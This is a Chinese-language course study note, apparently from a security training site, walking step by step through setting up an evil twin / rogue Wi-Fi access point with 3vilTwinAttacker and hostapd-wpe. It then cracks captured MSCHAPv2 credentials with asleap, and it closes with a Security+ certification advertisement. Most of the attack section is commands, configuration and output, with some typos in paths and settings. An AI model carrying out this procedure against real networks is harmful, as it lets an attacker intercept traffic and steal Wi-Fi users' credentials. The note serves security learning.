【安全牛学习笔记】EVIL TWIN AP、ROGUE AP

来源:互联网 发布:放置江湖武功最新数据 编辑:程序博客网 时间:2024/05/29 19:11

​EVIL TWIN AP、ROGUE AP

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃EVIL TWIN AP / ROGUE AP                                       ┃

┃3vilTwinAttacker                                              ┃

┃    git clone https://github.com/P0cL4bs/3vilTwinAttacker.git ┃

┃    cd 3vilTwinAttacker                                       ┃

┃    chmod +x installer.sh                                     ┃

┃    ./installer.sh --install                                  ┃

┃                                                              ┃

┃                                                              ┃

┃iptables                                                      ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

root@kali:~# git clone https://github.com/P0cL4bs/3vilTwinAttacker.git

正克隆到 '3vilTwinAttacker'...

remote: Counting objects: 849, done.

remote: Total 849 (delta 0), reused 0 (delta 0), pack-reused 849

接收对象中: 100% (849/849), 4.33 MiB | 459.00 KiB/s, 完成.

处理 delta 中: 100% (408/408), 完成.

检查连接... 完成。

root@kali:~# ls 3vilTwinAttacker

3vilTwinAttacker    isc-dhcp-server_4.3.1-6_amd64.deb

root@kali:~# cd 3vilTwinAttacker

root@kali:~/3vilTwinAttacker# ls

3vilTwinAttacker    isc-dhcp-server_4.3.1-6_amd64.deb

root@kali:~/3vilTwinAttacker# cd 3vilTwinAttacker

root@kali:~/3vilTwinAttacker/3vilTwinAttacker# cd ..

root@kali:~/3vilTwinAttacker# apt-get install isc-dhcp-server

root@kali:~/3vilTwinAttacker# dpkg -i isc-dhcp-server_4.3.1-6_amd64.deb

Selecting previously unselected package isc-dhcp-server.

(Reading database ... 85%

Preparing to unpack is dpkg -i isc-dhcp-server_4.3.1-6_amd64.deb ...

Unpacking isc-dhcp-server (4.3.1-6) ...

Setting up isc-dhcp-server (4.3.1-6) ...

Generating /etc/default/isc-dhcp-server (4.3.1-6) ...

update-rc.d: We have no instructions for the isc-dhcp-server init script.

update-rc.d: It looks like a network service, we disable it.

insserv: warning: current start runlevel(s) (empty) of script 'isc-dhcp-server' overrides LSB defaults(2 3 4 5).

insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script 'isc-dhcp-server' overrides LSB defaults (0 1 6).

Processing triggers for systemd (215-17+deb8ul) ...

Processing triggers for man-db (2.7.0.2-5) ...

root@kali:~/3vilTwinAttacker# cd 3vilTwinAttacker

root@kali:~/3vilTwinAttacker/3vilTwinAttacker# ls

3vilTwinAttacker.py  CONTRIBUTING.md  installer.sh  logs     Plugins    requirements.txt  Settings    update.sh

CHANGELOG            Core             LICENSE       Modules  README.md  rsc               Templates

 

root@kali:~/3vilTwinAttacker/3vilTwinAttacker# ./installer.sh --install

root@kali:~/3vilTwinAttacker-master# ./3vilTwin.py --install

WARNING: No route found for IPv6 destination :: (no default route?)

[+] checking dependencies...

=============================

{+} dhcpd --> [Ok]...       |

{+} airbase-ng --> [Ok]...  |

{+} ettercap --> [Ok]...    |

{+} sslstrip --> [Ok]...    |

{+} Xterm  --> [Ok]...      |

{+} nmap  --> [Ok]...       |

{+} Starting GUI...         |

=============================



//3vilTwinAttacker v0.5.3 beta  百度网盘:  http://yun.baidu.com/s/1jGDuXc6

Modules----->Settings

iptables:

iptables -P FORWARD ACCEPT

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

hostpad:

###WPA/IEEE 802.11i

wpa=2

wpa_key_mgmt=WPA-PSK

wpa_passphrase=password

wpa_pairwise=CCMP

###hostapd event logger configuration

#logger_syslog=127

#logger_syslog_level=2

#logger_stdout=127

#logger_stdout_level=2

╋━━━━━━━━━━━━━━━╋

┃WPA企业                       ┃

┃hostapd-wpe                   ┃

┃    取代FreeRADIUS-wpe        ┃

┃    EAP-FAST/MSCHAPv2(Phase 0)┃

┃    PEAP/MSCHAPv2             ┃

┃    EAP-TTLS/MSCHAPv2         ┃

┃    EAP-TTLS/MSCHAPv2         ┃

┃    EAP-TTLS/MSCHAP           ┃

┃    EAP-TTLS/CHAP             ┃

┃    EAP-TTLS/PAP              ┃

╋━━━━━━━━━━━━━━━╋

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃WPA企业                                                                                 ┃

┃安装                                                                                    ┃

┃    git clone https://github.com/OpenSecurityRessarch/hostapd-wpe                       ┃

┃    apt-get install libssl-dev libnl-dev                                                ┃

┃    lib11、libnl-dev包不在kali2.0的官方库中                                             ┃

┃        wget http://ftp.debian.org/debian/pool/main/libn/libnl/libnl-dev 1.1-7 amd64.deb┃

┃        wget http://ftp.debian.org/debian/pool/main/libn/libnl/libnl1 1.1-7 amd64.denb  ┃

┃        dpkg -i libnl1_1.1_7_amd64.deb                                                  ┃

┃        dpkg -i libnl-dev1_1.1_7_amd64.deb                                              ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

Gateway:192.168.1.1

AP Name:CMCC-Free

Channel:11

Network Adapter:waln2

root@kali:~# git clone https://github.com/OpenSecurityRessarch/hostapd-wpe

root@kali:~# apt-get install libssl-dev 

root@kali:~# wget http://ftp.debian.org/debian/pool/main/libn/libnl/libnl-dev 1.1-7 amd64.deb

root@kali:~# wget http://ftp.debian.org/debian/pool/main/libn/libnl/libnl1 1.1-7 amd64.denb

root@kali:~# dpkg -i libnl1_1.1_7_amd64.deb

root@kali:~# dpkg -i libnl-dev1_1.1_7_amd64.deb

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃WPA企业                                                   ┃

┃wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz ┃

┃tar -zxf hostapd-2.2.tar.gz                               ┃

┃cd hostapd-2.2                                            ┃

┃patch -p 1 < ../hostapd-wpe/hostapd-wpe.patch             ┃

┃cd hostapd                                                ┃

┃make                                                      ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

root@kali:~# wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz

root@kali:~# tar -zxf hostapd-2.2.tar.gz

root@kali:~# cd hostapd-2.2

root@kali:~/hostapd-2.2# patch -p 1 < ../hostapd-wpe/hostapd-wpe.patch

root@kali:~/hostapd-2.2# cd hostapd

root@kali:~/hostapd# make

╋━━━━━━━━━━━━━━━━━╋

┃WPA企业                           ┃

┃生成证书                          ┃

┃    cd ../../hostapd-wpe/certs    ┃

┃    ./bootstrap                   ┃

┃service network-manager stop      ┃

┃airmon-ng check kill              ┃

┃映射无线网卡                      ┃

┃ifconfig wlan2 up                 ┃

┃启动伪造AP                        ┃

┃    cd ../../hostapd-2.2/hostapd  ┃

┃    ./hostapd-wpe hostapd-wpe.conf┃

╋━━━━━━━━━━━━━━━━━╋

# Interface - Probably wlan0 for 802.11, eth0 for wired interface=wlan2

# Driver - comment this out if 802.11

#dirver=wired

dirver=nl80211

# May have to change these depending on build location

eap_user_file=hostapd-wpe.eap_user

ca_cert=../../hostapd-wpe/certs/ca/pem

server_cert=../../hostapd-wpe/certs/server.pem

private_key=../../hostapd-wpe/certs/server.pem

private_key_passwd=whatever

dh_file=../../hostapd-wpe/certs/dh

# 802.11 Options - Uncomment all if 802.11

ssid=kifi

hw_mode=g

channel=11

root@kali:~/hostapd-2.2# cd ../../hostapd-wpe/certs

root@kali:~/hostapd-2.2# ./bootstrap

root@kali:~/hostapd-2.2# service network-manager stop

root@kali:~/hostapd-2.2# airmon-ng check kill

root@kali:~/hostapd-2.2# ifconfig wlan2 up

root@kali:~/hostapd-2.2# cd ../../hostapd-2.2/hostapd

root@kali:~/hostapd-2.2# ./hostapd-wpe hostapd-wpe.conf

Configuration file: hostapd-wpe.conf

Using interface wlan2 with hwaddr 08:57:00:0c:96:68 and ssid "kifi"

wlan2: interface state UNINIIALIZED->ENABLED

wlan2: AP-ENABLED

root@kali:~# asleap -C 1c:27:22:95:77:fb:ab:3e -R fb:65:e5:66:f2:4d:12:07:6d:5e:6f:b0:6c:c5:16:cf:d5:bb:16:91:47:5d:11:20 -W /usr/share/john/password.lst

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂


Security+认证为什么是互联网+时代最火爆的认证?

      牛妹先给大家介绍一下Security+


        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。


原创粉丝点击